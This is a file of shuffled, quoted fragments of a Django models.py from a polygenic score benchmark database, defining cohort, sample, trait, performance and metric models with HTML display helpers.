models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def", "= self.class_acc_list class_acc_data = [] if class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0],", "sstring += '</ul>' sstring += '<span class=\"only_export\">]</span>' sstring += '</div>' else: sstring +=", "None: sstring += '<li><span class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>'", "unit = models.TextField(verbose_name='Units of the effect size', max_length=100, blank = False) ci =", "django.db import models from django.conf import settings from django.core.validators import MaxValueValidator, MinValueValidator from", "#@property #def category_labels_list(self): # categories = self.category_list # if len(categories) > 0: #", "'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def class_acc_list(self): return self.get_metric_data('Classification Metric')", "return self.bm_data['cohorts'] @property def ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property", "confidence intervals of a performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric", "'%s | %s '%(self.id, self.label) @property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property", "the International Classification of Diseases used in PGS \"\"\" id = models.CharField('Code ID',", "in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self): if not hasattr(self, 'bm_data'):", "= models.CharField('Code Label', max_length=500, db_index=True) type = models.CharField('Code 
Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class", "details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span", "phenotyping_free = models.TextField('Detailed Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time =", "models.TextField('Ontology Trait Description', null=True) #url = models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True)", "Sample sex type information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female')", "self.variability != None: type_desc = self.variability_type_desc() if (type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability,", "None def format_range(self): if self.estimate == None and self.range != None: return '{}:{}'.format(self.range_type,", "s) def display_value(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else:", "models.IntegerField('Number of Cases', null=True) sample_controls = models.IntegerField('Number of Controls', null=True) # Sample sex", "related_name='cohort_performance') def __str__(self): return '%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta:", "else: # return [] #@property #def mapped_terms_list(self): # if self.mapped_terms: # return self.mapped_terms.split('", "' {}'.format(str(self.range)) e += ' {}'.format(self.unit) if len(e) > 0: l.append(e) # Variability", "for x in categories] # else: # return [] #@property #def category_labels(self): #", "'%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by = 'num' @property", "class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self): data = [] phenotype_structured = 
self.phenotype_structured.all()", "variant associations and PGS training/testing\"\"\" # Sample Information ## Numbers sample_number = models.IntegerField('Number", "'+phenotype.label) return data def get_bm_data(self): self.bm_data = {} data_types = ['scores', 'cohorts', 'samples',", "Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study ID (GCST...)', max_length=20,", "from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe the International Classification of", "= '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip = '{} : {} {}'", "models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases', null=True) sample_controls = models.IntegerField('Number", "categories_data = ', '.join(category_labels) # return categories_data #@property #def display_category_labels(self): # categories =", "return self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics = {} effect_sizes_list = self.effect_sizes_list effect_sizes_data", "s = '{}'.format(self.estimate) if (self.name_short): return '%s (%s): %s'%(self.name, self.name_short, s) else: return", "in e: if self.range != None: type_desc = self.range_type_desc() if (type_desc): r =", "self.unit != None: l['unit'] = self.unit return l def range_type_desc(self): desc_list = {", "'{} : {} {}' # Estimate e = '' if self.estimate != None:", "None: return '{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self): if self.unit != None: return", "multiple EFO to a single score)\"\"\" id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True)", "to link multiple EFO to a single score)\"\"\" id = models.CharField('Ontology Trait ID',", "variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type = 
models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g.", "if self.unit != None: l['unit'] = self.unit return l def range_type_desc(self): desc_list =", "self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate) return None def format_range(self): if self.estimate ==", "if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = { 'sd': 'Standard", "l[self.range_type] = str(self.range) # Variability if self.variability != None: l[self.variability_type] = self.variability #", "categories = self.category_list # categories_data = '' # if len(categories) > 0: #", "0: # category_labels = [] # for category in categories: # v_spacing =", "def __str__(self): return '%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by", "ID (PMID) or doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional", "name, value and confidence intervals of a performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE,", "'ancestries'] data = {} for type in data_types: data[type] = set() #for bm_performance", "return [] #@property #def category_labels(self): # category_labels = self.category_labels_list # categories_data = ''", "self.unit != None: return '{}:{}'.format('unit', self.unit) return None def display_value(self): l = []", "(type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit)", "return self.synonyms.split(' | ') # else: # return [] #@property #def mapped_terms_list(self): #", "type information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female') ] sample_sex", "sstring += '<li><span class=\"only_export\">, </span>' 
sstring += '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring", "django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe the International Classification of Diseases", "return self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics", "'[' not in e: if self.range != None: type_desc = self.range_type_desc() if (type_desc):", "'{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring += '<span class=\"only_export\">]</span>' sstring += '</div>' else:", "self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics", "Range r = None if '[' not in e: if self.range != None:", "# Estimate e = '' if self.estimate != None: e += '{} :", "#return len(list(cohorts)) @property def count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property", "r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if", "sample_cases = models.IntegerField('Number of Cases', null=True) sample_controls = models.IntegerField('Number of Controls', null=True) #", "!= None: return '{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self): if self.unit != None:", "samples\"\"\" name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full = models.CharField('Cohort Full Name',", "# return [] #@property #def category_labels(self): # category_labels = self.category_labels_list # categories_data =", "None if '[' not in e: if self.range != None: type_desc = self.range_type_desc()", "!= None: type_desc = self.range_type_desc() if (type_desc): r = 
helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit)", "= False) ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard error of", "and format the diverse metric data\"\"\" # Using all and filter afterward uses", "[] #@property #def mapped_terms_list(self): # if self.mapped_terms: # return self.mapped_terms.split(' | ') #", "and a set of samples\"\"\" # Links to related objects score_id = models.CharField('Polygenic", "self.category_list # if len(categories) > 0: # return [x.label for x in categories]", "(%s): %s'%(self.name, self.name_short, s) else: return '%s: %s'%(self.name, s) def display_value(self): if self.ci", "id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div", "if '[' not in e: if self.range != None: type_desc = self.range_type_desc() if", "data_types = ['scores', 'cohorts', 'samples', 'ancestries'] data = {} for type in data_types:", "(ci), range, interquartile range (iqr), open range variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type", "desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = { 'sd': 'Standard Deviation', 'sd (cases)': 'Standard Deviation',", "1): return l[0] elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def", "return self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy", "# if len(categories) > 0: # return [x.label for x in categories] #", "'samples', 'ancestries'] data = {} for type in data_types: data[type] = set() #for", "not hasattr(self, 'bm_data'): self.get_bm_data() #scores = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # 
scores.add(bm_performance.score_id)", "import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe the International Classification of Diseases used", "self.range != None and self.range_type.lower() == 'ci': e += ' {}'.format(str(self.range)) e +=", "estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. [mean, median] unit = models.TextField(verbose_name='Unit',", "models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self):", "[] if class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] =", "method to extract and format the diverse metric data\"\"\" # Using all and", "percent = (self.sample_cases / self.sample_number) * 100 return round(percent,2) else: return None def", "the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring +=", "if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self): if not hasattr(self,", "estimate = '' if self.estimate != None: estimate = str(self.estimate) if self.range !=", "= ''.join(category_labels) # return categories_data class BM_Demographic(models.Model): \"\"\"Class to describe Sample fields (sample_age,", "used for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort,", "= {} # Estimate estimate = '' if self.estimate != None: estimate =", "max_length=30, primary_key=True) label = models.CharField('Code Label', max_length=500, db_index=True) type = 
models.CharField('Code Type', max_length=10)", ": {}'.format(self.estimate_type.title(), self.estimate) if self.range != None and self.range_type.lower() == 'ci': e +=", "othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def", "error of the effect', null=True) def __str__(self): if self.ci != None: s =", "+= '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None: sstring += '<li><span class=\"only_export\">, </span>'", "helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r !=", "Trait ID', max_length=30, primary_key=True) label = models.CharField('Ontology Trait Label', max_length=500, db_index=True) description =", "v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v != None: l.append(v) # Range r", "percent_cases = f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide", "max_length=100, default='se') # e.g. standard deviation (sd), standard error (se) def format_estimate(self): if", "return '%s | %s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by = 'num'", "%s | %s'%(self.efotrait.id, self.score_id, self.cohort.name_short) class Meta: get_latest_by = 'num' @property def effect_sizes_list(self):", "models.FloatField(verbose_name='Standard error of the effect', null=True) def __str__(self): if self.ci != None: s", "= models.TextField('Country of Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources", "class BM_Demographic(models.Model): \"\"\"Class to describe Sample fields (sample_age, followup_time) that can be point", "(e.g. 
French, Chinese)', null=True) ancestry_country = models.TextField('Country of Recruitment', null=True) ancestry_additional = models.TextField('Additional", "# return self.synonyms.split(' | ') # else: # return [] #@property #def mapped_terms_list(self):", "title=\"Click to show/hide the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\"", "desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe samples used in variant associations and PGS", "= models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. Confidence interval (ci), range, interquartile range", "choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) #", "than filtering directly on the queryset metrics = self.performance_metric.all() if metrics: l =", "if len(l) != 0: return l return None class BM_Metric(models.Model): \"\"\"Class to hold", "models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe cohorts used in samples\"\"\" name_short", "self.mapped_terms.split(' | ') # else: # return [] #@property #def category_list(self): # return", "models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance')", "= '' if self.sample_cases != None: percent_cases = '' if show_percent_cases: percent_cases =", "None and self.range_type.lower() == 'ci': e += ' {}'.format(str(self.range)) e += ' {}'.format(self.unit)", "@property def ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self):", "if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{} 
({})'.format(self.ancestry_broad, self.ancestry_free)", "ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g. French, Chinese)', null=True)", "null=False) unit = models.TextField(verbose_name='Units of the effect size', max_length=100, blank = False) ci", "se = models.FloatField(verbose_name='Standard error of the effect', null=True) def __str__(self): if self.ci !=", "on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free = models.TextField('Detailed Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding,", "[years, months, days] range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100,", "(len(l) == 1): return l[0] elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return", "null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s | %s '%(self.id,", "the queryset metrics = self.performance_metric.all() if metrics: l = [] for m in", "'' if self.estimate != None: e += '{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range", "@property def count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set()", "models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False)", "= 'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def class_acc_list(self): return self.get_metric_data('Classification", "(sample_age, followup_time) that can be point estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)',", "else: s = '{}'.format(self.estimate) 
return s def name_tuple(self): if self.name_short is None: return", "def range_type_desc(self): desc_list = { 'ci': 'Confidence interval', 'iqr': 'Interquartile range' } if", "category_list(self): # return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def category_labels_list(self): # categories =", "(PGS) ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples", "in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type", "max_length=100, default='range') # e.g. Confidence interval (ci), range, interquartile range (iqr), open range", "# Sample sex type information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male', 'Male'), ('Female',", "class=\"pgs_helptip\">{}</span> : {} {}' no_helptip = '{} : {} {}' # Estimate e", "unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. 
[years, months, days] range =", "#@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def category_labels_list(self): #", "related_name='sample_performance') # Samples used for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\")", "metric_type): \"\"\" Generic method to extract and format the diverse metric data\"\"\" #", "def othermetrics_list(self): return self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics = {} effect_sizes_list =", "effect_sizes_data class_acc_list = self.class_acc_list class_acc_data = [] if class_acc_list: for class_acc in self.class_acc_list:", "describe the International Classification of Diseases used in PGS \"\"\" id = models.CharField('Code", "= { 'ci': 'Confidence interval', 'iqr': 'Interquartile range' } if self.range_type.lower() in desc_list:", "__str__(self): return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases != None: percent =", "count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data() #scores = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'):", "range (iqr), open range variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range (type)',", "related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s | %s", "{} effect_sizes_list = self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list: for effect_size in self.effect_sizes_list:", "Diseases used in PGS \"\"\" id = models.CharField('Code ID', max_length=30, primary_key=True) label =", "metrics: if (m.type == metric_type): l.append((m.name_tuple(), 
m.display_value())) if len(l) != 0: return l", "Estimate e = '' if self.estimate != None: e += '{} : {}'.format(self.estimate_type.title(),", "(GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source PubMed ID (PMID) or doi', max_length=100, null=True)", "self.label) @property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): # return", "str(self.range) if estimate: l[self.estimate_type] = estimate # Range if self.range != None and", "name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full = models.CharField('Cohort Full Name', max_length=1000)", "= models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self):", "verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s", "# categories_data = ''.join(category_labels) # return categories_data class BM_Demographic(models.Model): \"\"\"Class to describe Sample", "get_metric_data(self, metric_type): \"\"\" Generic method to extract and format the diverse metric data\"\"\"", "and PGS training/testing\"\"\" # Sample Information ## Numbers sample_number = models.IntegerField('Number of Individuals',", "or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True,", "if (self.name_short): return '%s (%s): %s'%(self.name, self.name_short, s) else: return '%s: %s'%(self.name, s)", "db_index=True ) name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex: \"Odds Ratio\"", "len(categories) > 0: # category_labels = [] # 
for category in categories: #", "= [] # for category in categories: # v_spacing = ' class=\"mt-1\"' if", "null=True) se = models.FloatField(verbose_name='Standard error of the effect', null=True) def __str__(self): if self.ci", "PGS and a set of samples\"\"\" # Links to related objects score_id =", "# categories_data = '' # if len(category_labels) > 0: # categories_data = ',", "{}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) if (self.name_short): return '%s (%s): %s'%(self.name, self.name_short,", "else: return '%s: %s'%(self.name, s) def display_value(self): if self.ci != None: s =", "self.id, self.url) @property def display_phenotype_structured(self): data = [] phenotype_structured = self.phenotype_structured.all() for phenotype", "default='Other Metric', db_index=True ) name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex:", "'sd (cases)': 'Standard Deviation', 'se': 'Standard Error', } if self.variability_type.lower() in desc_list: return", "performance/accuracy metrics for a PGS and a set of samples\"\"\" # Links to", "Chinese)', null=True) ancestry_country = models.TextField('Country of Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry Description',", "followup_time) that can be point estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True)", "= {} effect_sizes_list = self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list: for effect_size in", "name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex: \"Odds Ratio\" name_short =", "class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) # return categories_data class BM_Demographic(models.Model): \"\"\"Class to", "r != None: l.append(r) if (len(l) == 1): return l[0] elif (len(l) >", "ancestry_free = 
models.TextField('Ancestry (e.g. French, Chinese)', null=True) ancestry_country = models.TextField('Country of Recruitment', null=True)", "self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics = {} effect_sizes_list = self.effect_sizes_list effect_sizes_data =", "e.g. [years, months, days] range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range (type)',", "'{:,} individuals'.format(self.sample_number) return sstring @property def display_ancestry(self): if self.ancestry_free in ['NR', '', None]:", "models.TextField('Ancestry (e.g. French, Chinese)', null=True) ancestry_country = models.TextField('Country of Recruitment', null=True) ancestry_additional =", "def format_range(self): if self.estimate == None and self.range != None: return '{}:{}'.format(self.range_type, str(self.range))", "l = [] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip =", "return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def category_labels_list(self): # categories = self.category_list #", "cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None: sstring += '<li><span class=\"only_export\">, </span>' sstring +=", "#def category_labels(self): # category_labels = self.category_labels_list # categories_data = '' # if len(category_labels)", "range_type_desc(self): desc_list = { 'ci': 'Confidence interval', 'iqr': 'Interquartile range' } if self.range_type.lower()", "l[0] elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def display_values_dict(self): l", "used in PGS \"\"\" id = models.CharField('Code ID', max_length=30, primary_key=True) label = models.CharField('Code", "= models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100) 
ancestry_free", "Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS", "self.variability) return None def format_unit(self): if self.unit != None: return '{}:{}'.format('unit', self.unit) return", "else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free in ['NR', '', None]:", "else: return None def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring = '' if", "intervals of a performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)',", "(value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. [mean, median] unit", "= models.TextField('Ontology Trait Description', null=True) #url = models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms',", "pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring +=", "Metric', db_index=True ) name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex: \"Odds", "# scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return", "if self.range != None and self.range_type.lower() == 'ci': estimate += str(self.range) if estimate:", "'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data = [] if othermetrics_list:", "sstring += '<div><a class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,} individuals <i", "\"\"\"Abstract 
class to hold information related to controlled trait vocabulary (mainly to link", "sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def category_labels_list(self): # categories = self.category_list # if", "self.estimate != None: estimate = str(self.estimate) if self.range != None and self.range_type.lower() ==", "Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free = models.TextField('Detailed Phenotype", "to describe samples used in variant associations and PGS training/testing\"\"\" # Sample Information", "get_latest_by = 'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def class_acc_list(self): return", "models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100) ancestry_free =", "on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect Size'), ('CM',", "'{}:{}'.format('unit', self.unit) return None def display_value(self): l = [] helptip = '<span title=\"{}\"", "describe Sample fields (sample_age, followup_time) that can be point estimates or distributions\"\"\" estimate", "estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g.", "+= '{:,} individuals'.format(self.sample_number) return sstring @property def display_ancestry(self): if self.ancestry_free in ['NR', '',", "doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort", "models.CharField(verbose_name='Performance Metric Name', max_length=100, 
null=False) # ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric", "'', None]: return self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to", "# e.g. Confidence interval (ci), range, interquartile range (iqr), open range variability =", "if (type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability,", "= models.TextField('Ancestry (e.g. French, Chinese)', null=True) ancestry_country = models.TextField('Country of Recruitment', null=True) ancestry_additional", "> 0: l.append(e) # Variability v = None if self.variability != None: type_desc", "models.TextField('Detailed Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of',", "'[' not in estimate: l[self.range_type] = str(self.range) # Variability if self.variability != None:", "len(category_labels) > 0: # categories_data = ', '.join(category_labels) # return categories_data #@property #def", "effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list class_acc_data = []", "self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v != None: l.append(v) #", "= [] if othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics']", "self.performance_metric.all() if metrics: l = [] for m in metrics: if (m.type ==", "None class BM_Metric(models.Model): \"\"\"Class to hold metric type, name, value and confidence intervals", "def 
display_ancestry(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad,", "be point estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate", "cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self): if not", "type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def count_scores(self): if not", "return None class BM_Metric(models.Model): \"\"\"Class to hold metric type, name, value and confidence", "= models.CharField('Code ID', max_length=30, primary_key=True) label = models.CharField('Code Label', max_length=500, db_index=True) type =", "range variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se') #", "str(self.range), self.unit) if r != None: l.append(r) if (len(l) == 1): return l[0]", "size', max_length=100, blank = False) ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se =", "#e.g. [mean, median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. 
